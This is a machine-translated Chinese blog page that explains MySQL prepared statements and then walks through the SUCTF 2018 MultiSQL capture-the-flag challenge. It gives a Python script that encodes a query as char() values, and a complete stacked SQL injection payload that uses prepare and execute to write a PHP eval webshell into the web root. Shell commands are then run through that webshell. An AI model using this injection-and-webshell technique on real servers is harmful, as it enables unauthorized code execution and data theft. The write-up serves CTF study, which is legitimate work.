当前位置:网站首页>[suctf 2018]multisql MySQL preprocessing
[suctf 2018]multisql MySQL preprocessing
2022-06-09 02:02:00 【I·CE】
MySQL Traditional treatment :
Client preparation sql sentence
send out sql Statement to MySQL The server
MySQL Server execution sql sentence
The server returns the execution result to the client
Basic preprocessing strategies :
take sql Statement forces a split into two :
The first part is the same command and structure as before
The second part is the following variable data part
First, put the front sql The statement is sent to MySQL The server , Let it perform overflow preprocessing first ( There is no real implementation ) First send sql The variable data parts in the statement are represented by a data placeholder , Like question marks ?
Preprocessing without parameters
Prepare preprocessing statements
prepare Statement name from “ Pretreated sql sentence ”;
prepare sql_1 from "select * from pdo";
Execute preprocessing statements
execute sql_1;
Delete preprocessing statements
drop prepare sql_1;
Preprocessing with parameters
Prepare preprocessing statements
prepare sql_2 from "select * from pdo where id = ?";
Define parameter variables
set @id=2;
The ginseng , Perform preprocessing
execute sql_2 using @id;
Delete
drop prepare sql_2;
[SUCTF 2018]MultiSQL Pretreatment injection
Use char() Bypass
str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
if i == 0:
print('char(%s'%ord(str[i]),end="")
else:
print(',%s'%ord(str[i]),end="")
print(')')
payload:
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;
visit /favicon/shell.php
system('ls /'); // In the root directory
system('cd /;cat *f*');
XOR injection
1^1^1 Return to true
边栏推荐
- Redis集群报错cluster_state:fail,如何解决并重新恢复集群(IP问题/ slot未完全分配问题)
- [azure application service] nodejs express + msal application realizes aad login and obtains accesstoken -- cca acquireTokenByCode(tokenRequest)
- Hello, people returning to work. Musk has been searching for "workaholics" again. Is telecommuting good or bad?
- 在苹果和三星都降价超千元后,国产手机坐不住了纷纷降价抛货
- Shell compare size
- 【刷穿剑指】剑指 Offer II 003. 前 n 个数字二进制中 1 的个数
- Zhihu hot discussion: at the age of 35, do you want to escape Beijing, Shanghai and Guangzhou?
- 在centOS中requires SQLite 3.8.3 or higher报错
- How to use mongodb database in laravel framework
- C language vaccine reservation management system
猜你喜欢

Lambda8 quickly realize list to map, grouping, filtering and other operations - personal notes

Explain sentinel fusing strategy, degradation rules and flow control

前迪士尼高管称德普将回归《加勒比海盗》 继续演船长

【Unity在Inspector面板修改值时销毁物体或组件】
![[brush through sword finger] sword finger offer II 003 Number of 1 in the first n digit binary](/img/4f/695bc08f4d2d7a2a33f6b13ebb40a8.png)
[brush through sword finger] sword finger offer II 003 Number of 1 in the first n digit binary

Abviewer layout detector function and performance improvement

Laravel基于MongoDB(LBS)实现附近的人、店铺、房源

年轻人“新宠”冷泡茶:能否开启下一个“立顿时代”?

谷歌chrome利用Bookmarks文件找回书签

Designer must have design navigation website
随机推荐
Designer must have design navigation website
Classify the audio and put it into the corresponding folder according to the file name
Former Disney executive says Depp will return to pirates of the Caribbean to continue playing Captain
How to use superset to seamlessly connect with MRS for self-service analysis
Swift GCD DispatchGroup Notify wait DispatchSourceTimer Monitor system file Two apps communicate
在centOS中requires SQLite 3.8.3 or higher报错
Shell command output
【Unity在Inspector面板修改值时销毁物体或组件】
127. principles of message subscription and publication
Buffett's alpha -- part of the code
Shell trimloader
GDB notes (10) - check for memory leak, heap overflow, stack overflow, global memory overflow, and continue using after release
C language library information management system
Laravel基于MongoDB(LBS)实现附近的人、店铺、房源
Shell loop for while (IV)
Shell 报告服务器信息
Shell compare size
QT epidemic information management system
C language library card management system
MySQL starts the binlog log to recover the erroneously deleted tables, data and MySQL database